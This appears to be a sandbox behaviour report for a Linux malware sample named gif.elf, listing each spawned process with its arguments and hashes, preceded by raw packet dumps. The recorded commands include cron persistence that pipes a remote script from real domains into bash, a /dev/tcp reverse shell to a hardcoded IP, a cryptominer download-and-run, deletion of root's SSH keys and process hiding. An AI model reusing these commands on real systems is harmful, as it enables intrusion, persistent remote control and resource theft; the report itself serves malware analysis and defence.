                                  Mar 10, 2025 02:52:35.943797112 CET1236INData Raw: f9 26 74 7d 7b 98 3f a7 48 a5 92 bc 5a 74 71 4d f7 94 95 43 84 46 f4 dd c5 a5 3f 65 c7 16 da 04 7b 0d 81 c9 65 1b 85 44 4c 5f 80 a5 07 86 0b e0 e5 b6 4c 39 0f 81 69 01 a4 03 f4 fa 53 a7 ed ae 88 7f 83 19 ca 56 d0 c6 3e 54 7e b7 4b 61 a4 d3 9e 07
                                  Data Ascii: &t}{?HZtqMCF?e{eDL_L9iSV>T~Kaww&mN'+p^(ZCI[7N(:0PS]F'-+AwZ)}MxGT|kD1ib5rwgT2t>eFo.GXJuxlz=
                                  Mar 10, 2025 02:52:35.943820953 CET1236INData Raw: 73 e7 07 2a 48 d3 30 0b bd 4f db 53 bb f7 3a 1e a1 5e 64 f6 3d 2a 6a bd 53 a4 da 2c fd dc 05 af 5d 9c 4b 9b 05 c0 da ca cb d7 6f eb 9d 4b ea 3d 58 b3 e9 de 08 e0 d1 6c 43 0a 47 cb a5 be 3f a7 59 08 2f ae b8 85 cc 68 37 52 32 4b 19 e7 80 d9 92 60
                                  Data Ascii: s*H0OS:^d=*jS,]KoK=XlCG?Y/h7R2K`W@N0h>(vO-!ic[:vk}7RH)Fr4zxVI/G;5,MbUvQ5lOfOZ.zx@i;os*x~9Go$"\s
                                  Mar 10, 2025 02:52:35.945313931 CET1236INData Raw: f8 b0 0d d2 2b c2 8c 6c cf 73 6e 77 66 2c ed 8d bb c1 b9 4a 82 9d c9 ad 02 19 8b 8c 5a f0 c7 70 5f 63 1f e4 8c f2 04 a0 9c 4b e7 c4 73 b0 90 81 b4 ac 20 7a 68 e7 63 12 16 3f 27 62 2d 7a db ce 9b f4 3d 16 9c c0 a8 c9 5e 5c fb 73 3d 79 9d 2b 03 38
                                  Data Ascii: +lsnwf,JZp_cKs zhc?'b-z=^\s=y+8PSqH~Nps1]F4TV@c]uFHdi)vb~Oq%"r[d)Ive6f_Q]98[6q@94Vj+R!xj=p"L,7DT
                                  Mar 10, 2025 02:52:35.945331097 CET388INData Raw: b2 9e 71 37 60 a7 f2 0f c3 d7 c3 81 64 e6 a5 50 d4 07 39 03 ef 66 e4 7a 11 ce df 9d 19 fa 4c 7d f5 a6 12 c2 7d 02 ed 8c 65 96 2d fa 4c f4 c4 56 35 26 67 e9 fd e9 46 4d 9e c8 f9 1c 93 62 64 a2 35 5f 42 18 ed 2b 80 e2 7a c2 90 40 9e 0c da 11 e5 e1
                                  Data Ascii: q7`dP9fzL}}e-LV5&gFMbd5_B+z@(u5:g(I/4U.7OTd2$B/1L^t|xps#d01!,q^8.wsk 3 {AgghG0O#<C/`[
                                  Mar 10, 2025 02:52:35.946599007 CET1236INData Raw: 00 5b 62 73 92 57 53 4b b7 13 a9 2b 0c 79 7a 11 24 b8 21 c6 ef 28 cf f5 8c e2 6f b5 4e a2 cc 31 5b e9 3b bf 59 74 fa aa b1 99 f0 57 a8 59 10 95 41 51 4f 30 05 e9 6c 79 da 6a d4 ca 7e ea 8d 7f 65 39 e5 cf a3 60 da 20 d5 2b e9 56 60 e3 b5 4f 0e bb
                                  Data Ascii: [bsWSK+yz$!(oN1[;YtWYAQO0lyj~e9` +V`O>8Yr9w4a4S])>xlhecDJ07pj9(S{:rZi|A9XXu,bsa4M>)%csGd_91uRv


                                  System Behavior

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:/tmp/gif.elf
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "chattr -ia -R /root/.ssh"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/chattr
                                  Arguments:chattr -ia -R /root/.ssh
                                  File size:14656 bytes
                                  MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "rm -rf /root/.ssh/authorized_keys2"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/rm
                                  Arguments:rm -rf /root/.ssh/authorized_keys2
                                  File size:72056 bytes
                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "chattr +i /root/.ssh/authorized_keys2"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/chattr
                                  Arguments:chattr +i /root/.ssh/authorized_keys2
                                  File size:14656 bytes
                                  MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "chattr -ia -R /etc/cron.d > /dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/chattr
                                  Arguments:chattr -ia -R /etc/cron.d
                                  File size:14656 bytes
                                  MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "chattr -ia /etc/crontab > /dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/chattr
                                  Arguments:chattr -ia /etc/crontab
                                  File size:14656 bytes
                                  MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "chattr -ia -R /var/spool/cron > /dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/chattr
                                  Arguments:chattr -ia -R /var/spool/cron
                                  File size:14656 bytes
                                  MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "chattr -ia -R /var/spool/cron/crontabs > /dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/chattr
                                  Arguments:chattr -ia -R /var/spool/cron/crontabs
                                  File size:14656 bytes
                                  MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "chattr -ia -R /etc/cron.hourly > /dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/chattr
                                  Arguments:chattr -ia -R /etc/cron.hourly
                                  File size:14656 bytes
                                  MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "echo '0 1 * * * root curl -fs http://z.shavsl.com/b|bash ' > /etc/cron.d/watch"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "echo '0 2 * * * root wget -c http://z.shavsl.com/b -qO -|bash ' >> /etc/cron.d/watch"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "chattr +i /etc/cron.d/watch > /dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/chattr
                                  Arguments:chattr +i /etc/cron.d/watch
                                  File size:14656 bytes
                                  MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "echo '#!/bin/bash' > /etc/cron.hourly/prelink"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "echo 'bash -i >& /dev/tcp/45.125.66.31/8443 0>&1' >> /etc/cron.hourly/prelink"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "chmod 755 /etc/cron.hourly/prelink"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/chmod
                                  Arguments:chmod 755 /etc/cron.hourly/prelink
                                  File size:63864 bytes
                                  MD5 hash:739483b900c045ae1374d6f53a86a279

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "chattr +i /etc/cron.hourly/prelink > /dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/chattr
                                  Arguments:chattr +i /etc/cron.hourly/prelink
                                  File size:14656 bytes
                                  MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "chattr -ia -R /root/.ssh"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/chattr
                                  Arguments:chattr -ia -R /root/.ssh
                                  File size:14656 bytes
                                  MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "rm -rf /root/.ssh/authorized_keys"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/rm
                                  Arguments:rm -rf /root/.ssh/authorized_keys
                                  File size:72056 bytes
                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "chattr +i /root/.ssh/authorized_keys"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/chattr
                                  Arguments:chattr +i /root/.ssh/authorized_keys
                                  File size:14656 bytes
                                  MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "chattr -ia -R /root/.ssh"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/chattr
                                  Arguments:chattr -ia -R /root/.ssh
                                  File size:14656 bytes
                                  MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "rm -rf /root/.ssh/authorized_keys2"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/rm
                                  Arguments:rm -rf /root/.ssh/authorized_keys2
                                  File size:72056 bytes
                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "chattr +i /root/.ssh/authorized_keys2"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/chattr
                                  Arguments:chattr +i /root/.ssh/authorized_keys2
                                  File size:14656 bytes
                                  MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "curl -fs http://w.softprojectcode.com/miner -o /tmp/.miner && chmod 755 /tmp/.miner && /tmp/.miner"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:34
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/curl
                                  Arguments:curl -fs http://w.softprojectcode.com/miner -o /tmp/.miner
                                  File size:239848 bytes
                                  MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                                  Start time (UTC):01:52:36
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:36
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/chmod
                                  Arguments:chmod 755 /tmp/.miner
                                  File size:63864 bytes
                                  MD5 hash:739483b900c045ae1374d6f53a86a279

                                  Start time (UTC):01:52:36
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:36
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/.miner
                                  Arguments:/tmp/.miner
                                  File size:1827416 bytes
                                  MD5 hash:44de739950eb4a8a3552b4e1987e8ec2

                                  Start time (UTC):01:52:37
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/.miner
                                  Arguments:-
                                  File size:1827416 bytes
                                  MD5 hash:44de739950eb4a8a3552b4e1987e8ec2

                                  Start time (UTC):01:52:37
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "rm -f /etc/hosts.old"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:37
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:37
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/rm
                                  Arguments:rm -f /etc/hosts.old
                                  File size:72056 bytes
                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                  Start time (UTC):01:52:37
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/.miner
                                  Arguments:-
                                  File size:1827416 bytes
                                  MD5 hash:44de739950eb4a8a3552b4e1987e8ec2

                                  Start time (UTC):01:52:37
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/.miner
                                  Arguments:-
                                  File size:1827416 bytes
                                  MD5 hash:44de739950eb4a8a3552b4e1987e8ec2

                                  Start time (UTC):01:52:37
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "mount --bind /proc/1 /proc/5534"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:37
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:37
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/mount
                                  Arguments:mount --bind /proc/1 /proc/5534
                                  File size:55528 bytes
                                  MD5 hash:92b20aa8b155ecd3ba9414aa477ef565

                                  Start time (UTC):01:52:37
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:37
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "chattr -ia /tmp/python > /dev/null 2>&1 && rm -rf /tmp/python > /dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:37
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:37
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/chattr
                                  Arguments:chattr -ia /tmp/python
                                  File size:14656 bytes
                                  MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "chattr -ia chattr -ia /usr/bin/bsd-port/getty > /dev/null 2>&1 && rm -rf /usr/bin/bsd-port/getty > /dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/chattr
                                  Arguments:chattr -ia chattr -ia /usr/bin/bsd-port/getty
                                  File size:14656 bytes
                                  MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "chattr -ia /usr/bin/.sshd > /dev/null 2>&1 && rm -rf /usr/bin/.sshd > /dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/chattr
                                  Arguments:chattr -ia /usr/bin/.sshd
                                  File size:14656 bytes
                                  MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "chattr -ia /etc/rc.d/init.d/selinux > /dev/null 2>&1 && rm -rf /etc/rc.d/init.d/selinux > /dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
